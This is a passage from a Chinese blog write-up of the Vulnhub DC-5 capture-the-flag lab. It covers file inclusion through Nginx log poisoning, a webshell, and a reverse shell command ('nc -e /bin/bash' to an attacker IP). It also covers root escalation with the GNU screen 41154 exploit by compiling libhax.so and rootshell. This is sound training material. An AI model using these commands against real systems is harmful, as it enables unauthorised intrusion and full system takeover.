[Vulnhub] DC-5靶机渗透

最新推荐文章于 2022-07-04 17:16:39 发布
最新推荐文章于 2022-07-04 17:16:39 发布
阅读量192 收藏
点赞数
分类专栏: 靶场笔记 文章标签: linux 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/119484628
版权

0x00 环境搭建

靶机地址:http://www.vulnhub.com/entry/dc-5,314/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
在这里插入图片描述
提示本关只有一个入口点(无SSH)

0x01 主机端口探测

arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
只有80端口可以利用

0x02 web渗透

访问80端口,目录扫描没发现什么奇怪的内容:
在这里插入图片描述
xray 扫描发现一个phpstudy默认配置Nginx解析漏洞,但是没上传点的话好像没什么用:
在这里插入图片描述
发现在 contact.php 提交数据后,返回 thankyou,php 的年份会有变化:
在这里插入图片描述在这里插入图片描述
打开footer.php,确定包含的文件时footer.php:
在这里插入图片描述
猜测存在文件包含漏洞,包含任意文件:
在这里插入图片描述Nginx 的配置文件在/etc/nginx/nginx.conf,包含找到access_log存放位置:
在这里插入图片描述发现可以访问access_log内容:
在这里插入图片描述

0x03 日志包含getshell

写入一句话木马,注意不能存在分号,有分号时无法访问日志文件。
在这里插入图片描述
包含文件执行命令:
在这里插入图片描述蚁剑连接构造 payload 反弹shell(这里执行不了bash命令):nc -e /bin/bash 192.168.1.143 4444
在这里插入图片描述
攻击机监听得到shell:
在这里插入图片描述

0x04 提权

获取交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'
查找设置了SUID的文件:find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
发现可使用screen命令,查找该命令是否存在可用漏洞:
在这里插入图片描述
运行时报错,是因为这个shell是在windows下编写的,所以换行格式与Linux不同,运行后无法解析,要将41154.sh文件转换成unix下可执行文件即可正常运行:

vim 41154.sh
:set ff? # 可以看到 dos 或 unix 的字样
:set ff=unix # 强化之转为unix格式,然后存盘输出

在这里插入图片描述
查看 kali 的 /tmp 目录,有几个新文件生成,编译得到可执行文件:

41154.sh中上面一部分c语言代码另存为libhax.c 并编译:gcc -fPIC -shared -ldl -o libhax.so libhax.c
在这里插入图片描述
41154.sh中下面一部分c语言代码另存为rootshell.c并编译:gcc -o rootshell rootshell.c
在这里插入图片描述
在这里插入图片描述41154.sh中剩下部分代码另存为dc5.sh脚本文件并输入 :set ff=unix ,否则在执行脚本文件时后出错

libhax.sorootshelldc5.sh三个文件上传到服务器的/tmp目录下,为dc5.sh增加可执行权限,执行脚本:
在这里插入图片描述
成功提权,找到最终flag:
在这里插入图片描述

总结

整体流程如下:
主机发现 => 端口扫描 => 访问web服务 => 日志写入一句话木马 => 日志包含getshell => nc反弹shell => 利用screen命令漏洞提权 => 找到flag

与DC-4一样,难点都在提权上

参考链接:
https://zhuanlan.zhihu.com/p/105623299(Vulnhub之路Ⅹ——DC-5)

yAnd0n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dc-5靶机渗透笔记
现代鲁滨逊的博客
05-12 272
1.发现主机 192.168.14.153 2.开启nmap端口扫描,开放了80,111,37620端口 3.访问站点,啥也没有 4.扫描后台文件,还是啥也没有 5. 然后看别人的笔记就是,每刷新一次thankyou.php,页尾的年份就会更新,别人扫出了个footer.php,推断出thankyou.php会包含footer.php,然后就猜想有文件包含漏洞,至于传递的参数是file应该是爆破出来的。 6. 尝试读取/etc/passwd文件 7.想尝试远程文件包含,但是不知道
DC-5靶机渗透
m0_62008601的博客
05-21 659
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
DC-5 靶机渗透
Rex_Surprise的博客
05-10 238
DC-5 靶机渗透 1.渗透过程 THEEND! DC-5 靶机渗透1.渗透过程 开始,扫描主机: netdiscover -r 192.168.0.1/24 找到一个 192.168.0.149 00:0c:29:cb:31:5f 1 60 VMware, Inc. 扫端口: nmap -sS -A -p- ...
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 1009
DC-5
DC5靶机渗透测试
Huangshanyoumu的博客
04-17 421
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞发现1.访问靶机 web 服务2.尝试利用文件包含漏洞3.尝试将恶意文件写入日志4.利用文件包含访问日志并进行利用三、提权1.查看可以 root 权限使用的命令2.漏洞搜索3.查找 exp,并查看内容4.使用 ftp 进行传输文件 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-5(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.2.186
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-5靶场渗透
一纸荒芜的博客
07-04 1573
DC-5 靶场
dc-5 靶机渗透学习
..
03-20 1891
信息收集 扫描存活主机 nmap -sP 192.168.202.0/24 对靶机开放的端口服务进行扫描 nmap -A -p- -v 192.168.202.143 漏洞利用 访问80端口 ,用Wappalyzer识别框架,发现只是个简单的页面 查看一下源代码,发现有五个php文件,分别对应五个标题 来到Contact查看了一下,发现有几个地方可以填写信息,抓取发送的数据包查看了一下,没什么特别。 发送数据后会跳转到thankyou.php,并且...
DC-5靶机渗透测试(文件包含漏洞)
single_g_l的博客
03-26 8978
一、 环境 靶机: 192.168.1.127 攻击机:192.168.1.209 二、信息收集 1、主机发现&端口扫描 nmap -sP 192.168.1.0/24 #发现存活主机 nmap -sS A 192.168.1.127 #开放端口 2、访问80端口 3、尝试提交留言,刷新页面,“Copyright © 2017”动态变化 刷新页面,“Copyright © 2017”动态变化 4、dirsearch 扫描敏感目录 dirsearch .
VulnHub靶机渗透】八:DC-5
野原新之助
05-07 586
靶机Web处存在文件包含漏洞,本地提权存在screen已知版本漏洞。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5935
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub靶机 DC-5
菜浪马废的博客
03-30 272
先找到靶机 然后扫一下 nmap -sP 192.168.0.0/24 nmap -sV 192.168.0.149 发现底下的年份一直再变,怀疑文件包含漏洞 写个phpinfo试一下 返回phpinfo页面 成功 <?php phpinfo();?> 监听端口 nc建立连接 nc -nlvp 4444 /thankyou.php?file=/var/log/ngi...
vulnhubDC5
底层社会中的弱智
01-20 529
在前面的总结,遇见多参数的传值,可以尝试wfuzz来查看是否存在隐藏参数或者检测LFI漏洞 找到目标机器的IP为192.168.1.110 使用nmap来扫描一下开放的端口以及服务 80端口http服务(敏感目录爆破,十大常规漏洞的检测,中间件解析漏洞) 111端口rpc服务 NFS网络文件共享(showmount -a ip来查看具体的文件) 我先使用showmount命令来查看一下...
vulnhub--DC5
weixin_55129870的博客
05-19 308
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
Vulnhub靶机渗透学习记录:DC-5
Youanddream的博客
01-15 462
dc-5 信息收集--目录爆破--文件包含getshell--权限提升
渗透DC-1靶机设计思路
最新发布
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值